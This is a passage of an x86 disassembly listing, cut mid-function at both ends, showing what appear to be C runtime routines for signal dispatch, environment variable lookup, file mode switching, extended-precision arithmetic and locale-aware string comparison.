loc_421C14: ; CODE XREF: sub_4219A9+239�j
; sub_4219A9+275�j
cmp eax, ecx
jb short loc_421C24
cmp byte ptr [eax], 30h
jnz short loc_421C20
dec eax
jmp short loc_421C14
; ---------------------------------------------------------------------------
loc_421C20: ; CODE XREF: sub_4219A9+272�j
cmp eax, ecx
jnb short loc_421BFD
loc_421C24: ; CODE XREF: sub_4219A9+26D�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ecx], 30h
loc_421C33: ; CODE XREF: sub_4219A9+87�j
and byte ptr [ebx+5], 0
push 1
pop eax
jmp short loc_421C0F
sub_4219A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421C3C proc near ; CODE XREF: sub_41D4FC+342F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, edi
dec eax
dec eax
jz short loc_421CA3
dec eax
dec eax
jz short loc_421C94
sub eax, 4
jz short loc_421C94
sub eax, 3
jz short loc_421C94
sub eax, 4
jz short loc_421C87
sub eax, 6
jz short loc_421C7A
dec eax
jz short loc_421C6D
or eax, 0FFFFFFFFh
jmp loc_421D65
; ---------------------------------------------------------------------------
loc_421C6D: ; CODE XREF: sub_421C3C+27�j
mov esi, ds:dword_48A2F4
mov eax, offset dword_48A2F4
jmp short loc_421CAE
; ---------------------------------------------------------------------------
loc_421C7A: ; CODE XREF: sub_421C3C+24�j
mov esi, ds:dword_48A2F0
mov eax, offset dword_48A2F0
jmp short loc_421CAE
; ---------------------------------------------------------------------------
loc_421C87: ; CODE XREF: sub_421C3C+1F�j
mov esi, ds:dword_48A2F8
mov eax, offset dword_48A2F8
jmp short loc_421CAE
; ---------------------------------------------------------------------------
loc_421C94: ; CODE XREF: sub_421C3C+10�j
; sub_421C3C+15�j ...
push edi
call sub_421D69
mov esi, [eax+8]
add eax, 8
pop ecx
jmp short loc_421CAE
; ---------------------------------------------------------------------------
loc_421CA3: ; CODE XREF: sub_421C3C+C�j
mov esi, ds:dword_48A2EC
mov eax, offset dword_48A2EC
loc_421CAE: ; CODE XREF: sub_421C3C+3C�j
; sub_421C3C+49�j ...
cmp esi, 1
jnz short loc_421CBA
xor eax, eax
jmp loc_421D65
; ---------------------------------------------------------------------------
loc_421CBA: ; CODE XREF: sub_421C3C+75�j
test esi, esi
jnz short loc_421CC5
push 3
call sub_419AF6
loc_421CC5: ; CODE XREF: sub_421C3C+80�j
push ebx
push 8
pop ecx
cmp edi, ecx
jz short loc_421CD7
cmp edi, 0Bh
jz short loc_421CD7
cmp edi, 4
jnz short loc_421CFD
loc_421CD7: ; CODE XREF: sub_421C3C+8F�j
; sub_421C3C+94�j
mov ebx, ds:dword_48A0C8
and ds:dword_48A0C8, 0
cmp edi, ecx
jnz short loc_421D2C
mov edx, ds:dword_43BC1C
mov ds:dword_43BC1C, 8Ch
mov [ebp+arg_0], edx
jmp short loc_421D00
; ---------------------------------------------------------------------------
loc_421CFD: ; CODE XREF: sub_421C3C+99�j
mov ebx, [ebp+arg_0]
loc_421D00: ; CODE XREF: sub_421C3C+BF�j
cmp edi, ecx
jnz short loc_421D2C
mov eax, ds:dword_43BC10
mov ecx, ds:dword_43BC14
add ecx, eax
cmp eax, ecx
jge short loc_421D33
lea edx, [eax+eax*2]
sub ecx, eax
lea edx, ds:43BBA0h[edx*4]
loc_421D21: ; CODE XREF: sub_421C3C+EC�j
and dword ptr [edx], 0
add edx, 0Ch
dec ecx
jnz short loc_421D21
jmp short loc_421D33
; ---------------------------------------------------------------------------
loc_421D2C: ; CODE XREF: sub_421C3C+AA�j
; sub_421C3C+C6�j
and dword ptr [eax], 0
cmp edi, ecx
jnz short loc_421D41
loc_421D33: ; CODE XREF: sub_421C3C+D7�j
; sub_421C3C+EE�j
push ds:dword_43BC1C
push 8
call esi
pop ecx
pop ecx
jmp short loc_421D4F
; ---------------------------------------------------------------------------
loc_421D41: ; CODE XREF: sub_421C3C+F5�j
push edi
call esi
cmp edi, 0Bh
pop ecx
jz short loc_421D4F
cmp edi, 4
jnz short loc_421D62
loc_421D4F: ; CODE XREF: sub_421C3C+103�j
; sub_421C3C+10C�j
cmp edi, 8
mov ds:dword_48A0C8, ebx
jnz short loc_421D62
mov eax, [ebp+arg_0]
mov ds:dword_43BC1C, eax
loc_421D62: ; CODE XREF: sub_421C3C+111�j
; sub_421C3C+11C�j
xor eax, eax
pop ebx
loc_421D65: ; CODE XREF: sub_421C3C+2C�j
; sub_421C3C+79�j
pop edi
pop esi
pop ebp
retn
sub_421C3C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421D69 proc near ; CODE XREF: sub_421C3C+59�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, ds:dword_43BC18
cmp ds:dword_43BB9C, edx
push esi
mov eax, offset dword_43BB98
jz short loc_421D97
lea esi, [ecx+ecx*2]
lea esi, ds:43BB98h[esi*4]
loc_421D8B: ; CODE XREF: sub_421D69+2C�j
add eax, 0Ch
cmp eax, esi
jnb short loc_421D97
cmp [eax+4], edx
jnz short loc_421D8B
loc_421D97: ; CODE XREF: sub_421D69+16�j
; sub_421D69+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:43BB98h[ecx*4]
cmp eax, ecx
jnb short loc_421DAB
cmp [eax+4], edx
jz short locret_421DAD
loc_421DAB: ; CODE XREF: sub_421D69+3B�j
xor eax, eax
locret_421DAD: ; CODE XREF: sub_421D69+40�j
retn
sub_421D69 endp
; =============== S U B R O U T I N E =======================================
sub_421DAE proc near ; CODE XREF: sub_42094E+23�p
arg_0 = dword ptr 4
cmp ds:dword_48B690, 0
push ebx
push esi
mov esi, ds:dword_48A03C
push edi
jz short loc_421E25
test esi, esi
jnz short loc_421DDF
cmp ds:dword_48A044, esi
jz short loc_421E25
call sub_42217C
test eax, eax
jnz short loc_421E25
mov esi, ds:dword_48A03C
test esi, esi
jz short loc_421E25
loc_421DDF: ; CODE XREF: sub_421DAE+14�j
mov ebx, [esp+0Ch+arg_0]
test ebx, ebx
jz short loc_421E25
push ebx
call sub_417AB0
pop ecx
mov edi, eax
loc_421DF0: ; CODE XREF: sub_421DAE+6D�j
mov eax, [esi]
test eax, eax
jz short loc_421E25
push eax
call sub_417AB0
cmp eax, edi
pop ecx
jbe short loc_421E18
mov eax, [esi]
cmp byte ptr [eax+edi], 3Dh
jnz short loc_421E18
push edi
push ebx
push eax
call sub_42213D
add esp, 0Ch
test eax, eax
jz short loc_421E1D
loc_421E18: ; CODE XREF: sub_421DAE+51�j
; sub_421DAE+59�j
add esi, 4
jmp short loc_421DF0
; ---------------------------------------------------------------------------
loc_421E1D: ; CODE XREF: sub_421DAE+68�j
mov eax, [esi]
lea eax, [eax+edi+1]
jmp short loc_421E27
; ---------------------------------------------------------------------------
loc_421E25: ; CODE XREF: sub_421DAE+10�j
; sub_421DAE+1C�j ...
xor eax, eax
loc_421E27: ; CODE XREF: sub_421DAE+75�j
pop edi
pop esi
pop ebx
retn
sub_421DAE endp
; =============== S U B R O U T I N E =======================================
sub_421E2B proc near ; CODE XREF: sub_4211F1+8B�p
; sub_4211F1+D9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, ds:dword_48B440
jnb short loc_421E92
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_48B340[ecx*4]
lea edx, [ecx+eax*8+4]
mov cl, [ecx+eax*8+4]
test cl, 1
jz short loc_421E92
mov al, cl
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_421E6B
and cl, 7Fh
jmp short loc_421E78
; ---------------------------------------------------------------------------
loc_421E6B: ; CODE XREF: sub_421E2B+39�j
cmp [esp+4+arg_4], 4000h
jnz short loc_421E86
or cl, 80h
loc_421E78: ; CODE XREF: sub_421E2B+3E�j
neg eax
sbb eax, eax
mov [edx], cl
and ax, 0C000h
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_421E86: ; CODE XREF: sub_421E2B+48�j
mov ds:dword_48A014, 16h
jmp short loc_421E9C
; ---------------------------------------------------------------------------
loc_421E92: ; CODE XREF: sub_421E2B+B�j
; sub_421E2B+27�j
mov ds:dword_48A014, 9
loc_421E9C: ; CODE XREF: sub_421E2B+65�j
or eax, 0FFFFFFFFh
pop esi
retn
sub_421E2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421EA1 proc near ; CODE XREF: sub_4219A9+165�p
; sub_4220C1+69�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov cx, [ebx+0Ah]
xor eax, eax
push edi
mov [ebp+var_14], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
mov ax, [esi+0Ah]
mov edi, ecx
mov edx, 7FFFh
xor edi, eax
and eax, edx
and ecx, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_4220A1
cmp cx, 7FFFh
jnb loc_4220A1
cmp dx, 0BFFDh
ja loc_4220A1
cmp dx, 3FBFh
ja short loc_421F0A
xor eax, eax
jmp short loc_421F44
; ---------------------------------------------------------------------------
loc_421F0A: ; CODE XREF: sub_421EA1+63�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_421F2C
inc [ebp+arg_0]
test [esi+8], edx
jnz short loc_421F2C
xor eax, eax
cmp [esi+4], eax
jnz short loc_421F2E
cmp [esi], eax
jnz short loc_421F2E
jmp loc_42209B
; ---------------------------------------------------------------------------
loc_421F2C: ; CODE XREF: sub_421EA1+71�j
; sub_421EA1+79�j
xor eax, eax
loc_421F2E: ; CODE XREF: sub_421EA1+80�j
; sub_421EA1+84�j
cmp cx, ax
jnz short loc_421F51
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_421F51
cmp [ebx+4], eax
jnz short loc_421F51
cmp [ebx], eax
jnz short loc_421F51
loc_421F44: ; CODE XREF: sub_421EA1+67�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_4220BC
; ---------------------------------------------------------------------------
loc_421F51: ; CODE XREF: sub_421EA1+90�j
; sub_421EA1+98�j ...
mov [ebp+var_10], eax
lea eax, [ebp+var_20]
mov [ebp+var_4], eax
mov [ebp+arg_4], 5
loc_421F61: ; CODE XREF: sub_421EA1+122�j
mov eax, [ebp+var_10]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_421FB5
add eax, esi
lea ecx, [ebx+8]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], ecx
mov [ebp+var_18], eax
loc_421F7D: ; CODE XREF: sub_421EA1+112�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
movzx eax, word ptr [eax]
movzx ecx, word ptr [ecx]
imul eax, ecx
mov ecx, [ebp+var_4]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_421337
add esp, 0Ch
test eax, eax
jz short loc_421FA8
mov eax, [ebp+var_4]
inc word ptr [eax]
loc_421FA8: ; CODE XREF: sub_421EA1+FF�j
add [ebp+var_8], 2
sub [ebp+var_C], 2
dec [ebp+var_18]
jnz short loc_421F7D
loc_421FB5: ; CODE XREF: sub_421EA1+C9�j
add [ebp+var_4], 2
inc [ebp+var_10]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_421F61
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_421FF8
loc_421FD3: ; CODE XREF: sub_421EA1+14E�j
test byte ptr [ebp+var_1C+3], 80h
jnz short loc_421FF1
lea eax, [ebp+var_24]
push eax
call sub_4213B6
add [ebp+arg_0], 0FFFFh
pop ecx
cmp word ptr [ebp+arg_0], 0
jg short loc_421FD3
loc_421FF1: ; CODE XREF: sub_421EA1+136�j
cmp word ptr [ebp+arg_0], 0
jg short loc_422031
loc_421FF8: ; CODE XREF: sub_421EA1+130�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_422031
movsx eax, word ptr [ebp+arg_0]
neg eax
add [ebp+arg_0], eax
mov ebx, eax
loc_422011: ; CODE XREF: sub_421EA1+184�j
test byte ptr [ebp+var_24], 1
jz short loc_42201A
inc [ebp+var_14]
loc_42201A: ; CODE XREF: sub_421EA1+174�j
lea eax, [ebp+var_24]
push eax
call sub_4213E4
dec ebx
pop ecx
jnz short loc_422011
cmp [ebp+var_14], 0
jz short loc_422031
or byte ptr [ebp+var_24], 1
loc_422031: ; CODE XREF: sub_421EA1+155�j
; sub_421EA1+163�j ...
cmp word ptr [ebp+var_24], 8000h
ja short loc_422048
mov eax, [ebp+var_24]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_42207D
loc_422048: ; CODE XREF: sub_421EA1+196�j
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_42207A
and [ebp+var_24+2], 0
cmp [ebp+var_20+2], 0FFFFFFFFh
jnz short loc_422075
and [ebp+var_20+2], 0
cmp word ptr [ebp+var_1C+2], 0FFFFh
jnz short loc_42206F
inc [ebp+arg_0]
mov word ptr [ebp+var_1C+2], 8000h
jmp short loc_42207D
; ---------------------------------------------------------------------------
loc_42206F: ; CODE XREF: sub_421EA1+1C1�j
inc word ptr [ebp+var_1C+2]
jmp short loc_42207D
; ---------------------------------------------------------------------------
loc_422075: ; CODE XREF: sub_421EA1+1B5�j
inc [ebp+var_20+2]
jmp short loc_42207D
; ---------------------------------------------------------------------------
loc_42207A: ; CODE XREF: sub_421EA1+1AB�j
inc [ebp+var_24+2]
loc_42207D: ; CODE XREF: sub_421EA1+1A5�j
; sub_421EA1+1CC�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_4220A1
mov cx, word ptr [ebp+var_24+2]
or eax, edi
mov [esi], cx
mov ecx, [ebp+var_20]
mov [esi+2], ecx
mov ecx, [ebp+var_1C]
mov [esi+6], ecx
loc_42209B: ; CODE XREF: sub_421EA1+86�j
mov [esi+0Ah], ax
jmp short loc_4220BC
; ---------------------------------------------------------------------------
loc_4220A1: ; CODE XREF: sub_421EA1+42�j
; sub_421EA1+4D�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_4220BC: ; CODE XREF: sub_421EA1+AB�j
; sub_421EA1+1FE�j
pop edi
pop esi
pop ebx
leave
retn
sub_421EA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4220C1 proc near ; CODE XREF: sub_4214D8+440�p
; sub_4219A9+14C�p
var_C = byte ptr -0Ch
var_A = dword ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, offset dword_43C090
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
jz short loc_42213A
jge short loc_4220E9
mov eax, [ebp+arg_4]
mov ebx, offset dword_43C1F0
neg eax
mov [ebp+arg_4], eax
sub ebx, 60h
loc_4220E9: ; CODE XREF: sub_4220C1+16�j
cmp [ebp+arg_8], ecx
jnz short loc_4220F4
mov eax, [ebp+arg_0]
mov [eax], cx
loc_4220F4: ; CODE XREF: sub_4220C1+2B�j
cmp [ebp+arg_4], ecx
jz short loc_42213A
push esi
push edi
loc_4220FB: ; CODE XREF: sub_4220C1+75�j
mov eax, [ebp+arg_4]
add ebx, 54h
sar [ebp+arg_4], 3
and eax, 7
cmp eax, ecx
jz short loc_422133
lea eax, [eax+eax*2]
cmp word ptr [ebx+eax*4], 8000h
lea esi, [ebx+eax*4]
jb short loc_422126
lea edi, [ebp+var_C]
movsd
movsd
movsd
dec [ebp+var_A]
lea esi, [ebp+var_C]
loc_422126: ; CODE XREF: sub_4220C1+57�j
push esi
push [ebp+arg_0]
call sub_421EA1
pop ecx
pop ecx
xor ecx, ecx
loc_422133: ; CODE XREF: sub_4220C1+49�j
cmp [ebp+arg_4], ecx
jnz short loc_4220FB
pop edi
pop esi
loc_42213A: ; CODE XREF: sub_4220C1+14�j
; sub_4220C1+36�j
pop ebx
leave
retn
sub_4220C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42213D proc near ; CODE XREF: sub_421DAE+5E�p
; sub_422619+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jnz short loc_42214A
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42214A: ; CODE XREF: sub_42213D+7�j
push ds:dword_48B444
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_8]
push [ebp+arg_0]
push 1
push ds:dword_48B664
call sub_4221EA
add esp, 1Ch
test eax, eax
jnz short loc_422177
mov eax, 7FFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_422177: ; CODE XREF: sub_42213D+31�j
add eax, 0FFFFFFFEh
pop ebp
retn
sub_42213D endp
; =============== S U B R O U T I N E =======================================
sub_42217C proc near ; CODE XREF: sub_421DAE+1E�p
; sub_422492+5B�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
mov esi, ds:dword_48A044
push edi
xor edi, edi
mov eax, [esi]
cmp eax, edi
jz short loc_4221DD
mov ebx, ds:dword_424150
loc_422195: ; CODE XREF: sub_42217C+5F�j
push edi
push edi
push edi
push edi
push 0FFFFFFFFh
push eax
push edi
push 1
call ebx ; WideCharToMultiByte
mov ebp, eax
cmp ebp, edi
jz short loc_4221E5
push ebp
call sub_417B89
cmp eax, edi
pop ecx
mov [esp+14h+var_4], eax
jz short loc_4221E5
push edi
push edi
push ebp
push eax
push 0FFFFFFFFh
push dword ptr [esi]
push edi
push 1
call ebx ; WideCharToMultiByte
test eax, eax
jz short loc_4221E5
push edi
push [esp+18h+var_4]
call sub_422492
mov eax, [esi+4]
add esi, 4
pop ecx
cmp eax, edi
pop ecx
jnz short loc_422195
loc_4221DD: ; CODE XREF: sub_42217C+11�j
xor eax, eax
loc_4221DF: ; CODE XREF: sub_42217C+6C�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4221E5: ; CODE XREF: sub_42217C+29�j
; sub_42217C+38�j ...
or eax, 0FFFFFFFFh
jmp short loc_4221DF
sub_42217C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4221EA proc near ; CODE XREF: sub_42213D+27�p
var_3C = dword ptr -3Ch
var_36 = byte ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424C88
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
cmp ds:dword_48A300, ebx
push 1
pop edi
jnz short loc_42225D
push edi
mov eax, offset dword_4248D8
push eax
push edi
push eax
push ebx
push ebx
call ds:dword_424008 ; CompareStringW
test eax, eax
jz short loc_42223A
mov ds:dword_48A300, edi
jmp short loc_42225D
; ---------------------------------------------------------------------------
loc_42223A: ; CODE XREF: sub_4221EA+46�j
push edi
mov eax, offset dword_43C824
push eax
push edi
push eax
push ebx
push ebx
call ds:dword_42400C ; CompareStringA
test eax, eax
jz loc_422453
mov ds:dword_48A300, 2
loc_42225D: ; CODE XREF: sub_4221EA+31�j
; sub_4221EA+4E�j
mov esi, [ebp+arg_C]
cmp esi, ebx
jle short loc_422274
push esi
push [ebp+arg_8]
call sub_422467
pop ecx
pop ecx
mov esi, eax
mov [ebp+arg_C], esi
loc_422274: ; CODE XREF: sub_4221EA+78�j
cmp [ebp+arg_14], ebx
jle short loc_422289
push [ebp+arg_14]
push [ebp+arg_10]
call sub_422467
pop ecx
pop ecx
mov [ebp+arg_14], eax
loc_422289: ; CODE XREF: sub_4221EA+8D�j
mov eax, ds:dword_48A300
cmp eax, 2
jnz short loc_4222AE
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_42400C ; CompareStringA
jmp loc_422455
; ---------------------------------------------------------------------------
loc_4222AE: ; CODE XREF: sub_4221EA+A7�j
cmp eax, edi
jnz loc_422453
cmp [ebp+arg_18], ebx
jnz short loc_4222C3
mov eax, ds:dword_48A0B8
mov [ebp+arg_18], eax
loc_4222C3: ; CODE XREF: sub_4221EA+CF�j
cmp esi, ebx
jz short loc_4222D0
cmp [ebp+arg_14], ebx
jnz loc_422368
loc_4222D0: ; CODE XREF: sub_4221EA+DB�j
cmp esi, [ebp+arg_14]
jnz short loc_4222DD
loc_4222D5: ; CODE XREF: sub_4221EA+13C�j
; sub_4221EA+16D�j
push 2
loc_4222D7: ; CODE XREF: sub_4221EA+146�j
pop eax
jmp loc_422455
; ---------------------------------------------------------------------------
loc_4222DD: ; CODE XREF: sub_4221EA+E9�j
cmp [ebp+arg_14], edi
jle short loc_4222E9
loc_4222E2: ; CODE XREF: sub_4221EA+151�j
; sub_4221EA+159�j ...
mov eax, edi
jmp loc_422455
; ---------------------------------------------------------------------------
loc_4222E9: ; CODE XREF: sub_4221EA+F6�j
cmp esi, edi
jg short loc_42232E
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_18]
call ds:dword_4241CC ; GetCPInfo
test eax, eax
jz loc_422453
cmp esi, ebx
jle short loc_422332
cmp [ebp+var_3C], 2
jb short loc_42232E
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_42232E
loc_422314: ; CODE XREF: sub_4221EA+142�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_42232E
mov ecx, [ebp+arg_8]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_422328
cmp cl, dl
jbe short loc_4222D5
loc_422328: ; CODE XREF: sub_4221EA+138�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_422314
loc_42232E: ; CODE XREF: sub_4221EA+101�j
; sub_4221EA+120�j ...
push 3
jmp short loc_4222D7
; ---------------------------------------------------------------------------
loc_422332: ; CODE XREF: sub_4221EA+11A�j
cmp [ebp+arg_14], ebx
jle short loc_422368
cmp [ebp+var_3C], 2
jb short loc_4222E2
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_4222E2
loc_422345: ; CODE XREF: sub_4221EA+177�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_4222E2
mov ecx, [ebp+arg_10]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_42235D
cmp cl, dl
jbe loc_4222D5
loc_42235D: ; CODE XREF: sub_4221EA+169�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_422345
jmp loc_4222E2
; ---------------------------------------------------------------------------
loc_422368: ; CODE XREF: sub_4221EA+E0�j
; sub_4221EA+14B�j
push ebx
push ebx
push esi
push [ebp+arg_8]
push 9
push [ebp+arg_18]
call ds:dword_424070 ; MultiByteToWideChar
mov [ebp+var_1C], eax
cmp eax, ebx
jz loc_422453
mov [ebp+var_4], ebx
add eax, eax
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4223B7
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+arg_C]
push 1
pop edi
loc_4223B7: ; CODE XREF: sub_4221EA+1B5�j
cmp [ebp+var_24], ebx
jz loc_422453
push [ebp+var_1C]
push [ebp+var_24]
push esi
push [ebp+arg_8]
push edi
push [ebp+arg_18]
mov esi, ds:dword_424070
call esi ; MultiByteToWideChar
test eax, eax
jz short loc_422453
push ebx
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push 9
push [ebp+arg_18]
call esi ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_20], esi
cmp esi, ebx
jz short loc_422453
mov [ebp+var_4], edi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_422422
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor edi, edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_422422: ; CODE XREF: sub_4221EA+224�j
cmp edi, ebx
jz short loc_422453
push esi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push 1
push [ebp+arg_18]
call ds:dword_424070 ; MultiByteToWideChar
test eax, eax
jz short loc_422453
push esi
push edi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_424008 ; CompareStringW
jmp short loc_422455
; ---------------------------------------------------------------------------
loc_422453: ; CODE XREF: sub_4221EA+63�j
; sub_4221EA+C6�j ...
xor eax, eax
loc_422455: ; CODE XREF: sub_4221EA+BF�j
; sub_4221EA+EE�j ...
lea esp, [ebp-4Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4221EA endp
; =============== S U B R O U T I N E =======================================
sub_422467 proc near ; CODE XREF: sub_41E709+81�p
; sub_4221EA+7E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_422484
loc_422477: ; CODE XREF: sub_422467+1B�j
cmp byte ptr [eax], 0
jz short loc_422484
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_422477
loc_422484: ; CODE XREF: sub_422467+E�j
; sub_422467+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_42248F
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_42248F: ; CODE XREF: sub_422467+21�j
mov eax, edx
retn
sub_422467 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422492 proc near ; CODE XREF: sub_42217C+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_0], edi
jz short loc_4224F6
push 3Dh
push [ebp+arg_0]
call sub_4226D8
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
mov [ebp+var_8], esi
jz short loc_4224F6
cmp [ebp+arg_0], esi
jz short loc_4224F6
mov eax, ds:dword_48A03C
xor ebx, ebx
cmp [esi+1], bl
setz bl
cmp eax, ds:dword_48A040
jnz short loc_4224DC
push eax
call sub_422671
pop ecx
mov ds:dword_48A03C, eax
loc_4224DC: ; CODE XREF: sub_422492+3C�j
cmp eax, edi
jnz short loc_422534
cmp [ebp+arg_4], edi
jz short loc_4224FE
cmp ds:dword_48A044, edi
jz short loc_4224FE
call sub_42217C
test eax, eax
jz short loc_422534
loc_4224F6: ; CODE XREF: sub_422492+D�j
; sub_422492+22�j ...
or eax, 0FFFFFFFFh
loc_4224F9: ; CODE XREF: sub_422492+182�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4224FE: ; CODE XREF: sub_422492+51�j
; sub_422492+59�j
cmp ebx, edi
jnz loc_422612
push 4
call sub_417B89
cmp eax, edi
pop ecx
mov ds:dword_48A03C, eax
jz short loc_4224F6
mov [eax], edi
cmp ds:dword_48A044, edi
jnz short loc_422534
push 4
call sub_417B89
cmp eax, edi
pop ecx
mov ds:dword_48A044, eax
jz short loc_4224F6
mov [eax], edi
loc_422534: ; CODE XREF: sub_422492+4C�j
; sub_422492+62�j ...
sub esi, [ebp+arg_0]
mov edi, ds:dword_48A03C
mov [ebp+var_4], edi
push esi
push [ebp+arg_0]
call sub_422619
mov esi, eax
pop ecx
test esi, esi
pop ecx
jl short loc_422594
cmp dword ptr [edi], 0
jz short loc_422594
test ebx, ebx
jz short loc_42258C
push dword ptr [edi+esi*4]
lea edi, [edi+esi*4]
call sub_417C3B
pop ecx
loc_422566: ; CODE XREF: sub_422492+E2�j
cmp dword ptr [edi], 0
jz short loc_422576
mov eax, [edi+4]
inc esi
mov [edi], eax
add edi, 4
jmp short loc_422566
; ---------------------------------------------------------------------------
loc_422576: ; CODE XREF: sub_422492+D7�j
mov eax, esi
shl eax, 2
push eax
push [ebp+var_4]
call sub_41944F
pop ecx
test eax, eax
pop ecx
jz short loc_4225C6
jmp short loc_4225C1
; ---------------------------------------------------------------------------
loc_42258C: ; CODE XREF: sub_422492+C6�j
mov eax, [ebp+arg_0]
mov [edi+esi*4], eax
